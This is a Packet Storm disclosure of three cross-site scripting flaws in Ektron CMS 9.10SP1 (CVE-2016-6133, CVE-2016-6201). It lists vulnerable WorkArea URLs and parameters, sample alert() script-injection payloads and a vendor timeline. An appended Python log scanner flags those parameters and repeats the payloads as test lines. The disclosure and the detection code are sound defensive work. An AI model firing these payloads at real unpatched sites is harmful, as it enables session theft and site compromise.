Packet Storm | Edmund Goh | PACKETSTORM:143014
Jun 20, 2017 - 12:00 a.m.

Ektron CMS 9.10SP1 Cross Site Scripting

2017-06-20 00:00:00 | Edmund Goh | packetstormsecurity.com

EPSS: 0.005 (Low), percentile 72.4%

`# Vulnerability type: Cross Site Scripting  
# Vendor: Ektron  
# Product: Ektron Content Management System  
# Affected version: 9.10SP1(Build 9.1.0.184)  
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)  
# Credit: Siyavash Ghasseminia, Edmund Goh   
# CVE ID: CVE-2016-6133  
  
# PROOF OF CONCEPT  
  
Vulnerable URL:  
/WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033  
  
# VULNERABLE PARAMETERS:  
- folder_id  
  
  
# SAMPLE PAYLOAD  
- ',1);});alert(1);//  
Or  
- <script>alert(1)</script>  
  
  
# TIMELINE  
- 1/7/2016: Vulnerability found  
- 4/7/2016: Vendor informed  
- 13/7/2016: Vendor responded and acknowledged  
- 29/7/2016: Vendor fixed the issue  
- 19/6/2017: Public disclosure  
  
=================================================================  
  
# Vulnerability type: Cross Site Scripting  
# Vendor: Ektron  
# Product: Ektron Content Management System  
# Affected version: 9.10SP1(Build 9.1.0.184)  
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)  
# Credit: Siyavash Ghasseminia  
# CVE ID: CVE-2016-6133  
  
# PROOF OF CONCEPT  
  
Vulnerable URL:  
/WorkArea/SelectUserGroup.aspx?action=Report&rptStatus  
  
# VULNERABLE PARAMETERS:  
- rptStatus  
  
  
# SAMPLE PAYLOAD  
- </script><script>alert(0x0004EA)</script>  
  
  
# TIMELINE  
- 1/7/2016: Vulnerability found  
- 4/7/2016: Vendor informed  
- 13/7/2016: Vendor responded and acknowledged  
- 29/7/2016: Vendor fixed the issue  
- 19/6/2017: Public disclosure  
  
=================================================================  
  
# Vulnerability type: Cross Site Scripting  
# Vendor: Ektron  
# Product: Ektron Content Management System  
# Affected version: 9.10SP1(Build 9.1.0.184)  
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)  
# Credit: Siyavash Ghasseminia   
# CVE ID: CVE-2016-6201  
  
# PROOF OF CONCEPT  
  
Vulnerable URL:  
/WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0  
  
# VULNERABLE PARAMETERS:  
- ContType  
  
  
# SAMPLE PAYLOAD  
- %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp  
  
  
# TIMELINE  
- 1/7/2016: Vulnerability found  
- 4/7/2016: Vendor informed  
- 13/7/2016: Vendor responded and acknowledged  
- 29/7/2016: Vendor fixed the issue  
- 19/6/2017: Public disclosure  
`
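For sites still running the affected build, the three endpoint and parameter pairs listed above can be watched for in web server logs. The following is an added example, not part of the advisory or of Ektron's code: it flags requests where one of those parameters carries a value outside an allow-list. The allow-list patterns and the simplified log layout are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Lower-cased endpoint path -> (parameter named in the advisory, benign value shape).
# The value patterns are assumptions for this example; the advisory only shows
# folder_id=0 and ContType=zjgsa as ordinary values.
WATCHED = {
    "/workarea/workarea.aspx": ("folder_id", re.compile(r"-?\d{1,10}")),
    "/workarea/selectusergroup.aspx": ("rptStatus", re.compile(r"[A-Za-z0-9_]{0,32}")),
    "/workarea/content.aspx": ("ContType", re.compile(r"[A-Za-z0-9_]{0,32}")),
}

# Assumed log layout: client address, quoted "METHOD target", status code.
REQUEST = re.compile(r'"(?:GET|POST) (\S+)"')

def check_request(target):
    """Return (path, param, decoded_value) if a watched parameter fails its allow-list."""
    parts = urlsplit(target)
    rule = WATCHED.get(parts.path.lower())  # IIS paths are case-insensitive
    if rule is None:
        return None
    name, allowed = rule
    # parse_qsl percent-decodes values, so encoded markup is compared in clear form.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == name.lower() and not allowed.fullmatch(value):
            return (parts.path, name, value)
    return None

def scan_log(lines):
    """Return (line_number, path, param, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hit = check_request(match.group(1)) if match else None
        if hit:
            hits.append((number,) + hit)
    return hits

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '10.0.0.5 "GET /WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033" 200',
    '10.0.0.9 "GET /WorkArea/content.aspx?id=0&action=ViewContentByCategory&ContType=%22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp" 200',
    '10.0.0.9 "GET /workarea/SelectUserGroup.aspx?action=Report&rptStatus=%3C%2Fscript%3E" 200',
    '10.0.0.7 "GET /index.aspx?folder_id=%3Cb%3E" 200',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same allow-list comparison can serve as a temporary request filter in front of the WorkArea pages until the patched version is installed.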
